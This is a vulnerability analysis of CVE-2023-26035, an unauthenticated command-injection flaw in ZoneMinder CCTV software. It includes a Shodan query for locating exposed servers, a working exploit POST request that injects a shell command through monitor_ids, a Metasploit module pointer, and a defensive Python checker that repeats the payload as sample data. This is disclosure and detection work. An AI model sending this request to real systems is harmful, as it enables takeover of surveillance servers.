High
CVE-2023-26035
Description
ZoneMinder is a free, open source closed-circuit television software application for Linux which supports IP, USB and analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to unauthenticated remote code execution via missing authorization. There is no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in versions 1.36.33 and 1.37.33.
Ratings
- Attacker Value: High
- Exploitability: Very High
Technical Analysis
ZoneMinder is a free, open source closed-circuit television software application. At the time of writing there appear to be just over 3200 identifiable instances listening on the internet, according to the following crude Shodan query (the number on the last line is the count it returned):
shodan count "http.html:\"<title>ZM - Login</title>\" http.html:\"/zm/\""
3237
ZoneMinder prior to the versions listed below suffers from an unauthenticated remote code execution vulnerability in the default configuration. The vulnerability is trivial to trigger and provides a valuable entry point for attackers.
Vulnerable Versions
Prior to 1.36.33
Prior to 1.37.33
How it works
By default on affected versions, unauthenticated users can access the create snapshot action through the endpoint /zm/index.php. The following is an excerpt from snapshot.php:
if ( $action == 'create' ) {
  if ( ! (isset($_REQUEST['monitor_ids']) and count($_REQUEST['monitor_ids']) > 0 ) ) {
    ZM\Error('No monitor ids given in snapshot creation request');
    return;
  }
  $snapshot = new ZM\Snapshot();
The snapshot action expects a monitor_id in order to fetch an existing monitor; however, you can pass an object in order to create a new monitor instead (this is where the malicious payload is supplied). Soon after, the method TriggerOn() is called in order to retrieve an event_id:
$event_id = $monitor->TriggerOn();
ZM\Debug("Have event $event_id for monitor $monitor_id");
TriggerOn() immediately calls the function AlarmCommand($cmd):
function TriggerOn() {
  $output = $this->AlarmCommand('on');
Inside AlarmCommand a call to shell_exec is made, and it appends the monitor_id we sent earlier without applying any sanitization to the parameter:
$cmd = getZmuCommand($cmd.' -m '.validCardinal($this->{'Id'}));
$output = shell_exec($cmd);
Exploiting the vuln.
Note that in order to exploit this vulnerability you first have to grab a CSRF token from the response body of a request to /zm/index.php:
<div class="container">
  <form class="center-block" name="loginForm" id="loginForm" method="post" action="?view=login">
    <input type='hidden' name='__csrf_magic' value="key:1b3da97bd640e57e0ce5dc6f5a09e7a1a9368004,1699900789" />
    <input type="hidden" name="action" value="login"/>
    <input type="hidden" name="postLoginQuery" value="" />
In the above example the token is 1b3da97bd640e57e0ce5dc6f5a09e7a1a9368004,1699900789. With that information you can then send the following POST request to a vulnerable target in order to write a file to the temp directory:
POST /zm/index.php HTTP/1.1
Host: 192.168.65.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: application/x-www-form-urlencoded
Content-Length: 268

view=snapshot&action=create&monitor_ids[0][Id]=;touch%20/tmp/pwnd&__csrf_magic=key:1b3da97bd640e57e0ce5dc6f5a09e7a1a9368004,1699900789
If you want a shell, edit the POST request or use the Metasploit module unix/webapp/zoneminder_snapshots.
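The request shape above is easy to recognise on the defending side: a snapshot create submitted without a session, or a monitor_ids entry that is a nested array (an object) rather than a plain positive integer. The following Python is an added example, not ZoneMinder code and not part of the original assessment. It rebuilds the nested $_REQUEST structure PHP derives from bracketed form keys and then applies that check, which is what a reverse proxy rule or a review of captured POST bodies would do. It assumes that a legitimate request carries monitor_ids[]=<integer> (an assumption about normal use, not stated on the page), that the caller already knows whether the session is authenticated, and uses a placeholder in place of a real CSRF token; the sample requests are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests, not captured traffic: (label, session authenticated?, raw POST body).
# The CSRF token is a placeholder; the second body mirrors the shape shown in the write-up.
SAMPLES = [
    ("legit create, logged in", True,
     "view=snapshot&action=create&monitor_ids[]=3&__csrf_magic=key:PLACEHOLDER"),
    ("attack body shape, anonymous", False,
     "view=snapshot&action=create&monitor_ids[0][Id]=;touch%20/tmp/pwnd&__csrf_magic=key:PLACEHOLDER"),
    ("object instead of id, logged in", True,
     "view=snapshot&action=create&monitor_ids[0][Id]=7"),
    ("unrelated view", False,
     "view=login&action=login&username=admin"),
]

CARDINAL = re.compile(r"^[1-9][0-9]*$")               # what a real monitor Id looks like (assumed)
BRACKET = re.compile(r"^([^\[]+)((?:\[[^\]]*\])*)$")  # name[...][...] form of a PHP array key


def parse_php_form(body: str) -> dict:
    """Build the nested structure PHP puts in $_REQUEST from a urlencoded body:
    'a[0][Id]=x' -> {'a': {'0': {'Id': 'x'}}}, and 'a[]=3' appends under the next index."""
    result: dict = {}
    for pair in body.split("&"):
        if not pair:
            continue
        raw_key, _, raw_val = pair.partition("=")
        key, val = unquote_plus(raw_key), unquote_plus(raw_val)
        m = BRACKET.match(key)
        if not m:                      # malformed bracket syntax: keep the raw key
            result[key] = val
            continue
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = result
        for i, part in enumerate(path):
            if part == "":             # PHP's [] auto-index
                part = str(len(node))
            if i == len(path) - 1:
                node[part] = val
            else:
                if not isinstance(node.get(part), dict):
                    node[part] = {}
                node = node[part]
    return result


def check_snapshot_request(params: dict, authenticated: bool) -> list:
    """Return the reasons a snapshot-create request should be blocked or alerted on.
    An empty list means the request has the shape of ordinary use."""
    if params.get("view") != "snapshot" or params.get("action") != "create":
        return []
    reasons = []
    if not authenticated:
        reasons.append("snapshot create without an authenticated session")
    ids = params.get("monitor_ids")
    if not isinstance(ids, dict) or not ids:
        reasons.append("monitor_ids missing or not an array")
        return reasons
    for idx, entry in ids.items():
        if isinstance(entry, dict):
            # A nested array here is turned into a new Monitor object built from
            # request-supplied fields instead of a lookup of an existing monitor.
            reasons.append(f"monitor_ids[{idx}] is an object, not an id")
            entry = entry.get("Id", "")
        if not CARDINAL.match(str(entry)):
            reasons.append(f"monitor_ids[{idx}] Id is not a positive integer: {entry!r}")
    return reasons


def scan(samples=SAMPLES) -> dict:
    """Run the check over every sample and map label -> reasons."""
    return {label: check_snapshot_request(parse_php_form(body), auth)
            for label, auth, body in samples}


if __name__ == "__main__":
    for label, reasons in scan().items():
        print(f"{label}: {'OK' if not reasons else '; '.join(reasons)}")
```

The same two conditions describe the fix on the application side: the create action has to require an authenticated session with the right permissions, and the Id that reaches the zmu command line has to be a validated integer rather than a string taken from the request. Upgrading to the fixed versions listed above is the actual remedy; the check here is a stopgap and a way to spot attempts in traffic you already capture.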
References
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr
General Information
Vendors
- zoneminder
Products
- zoneminder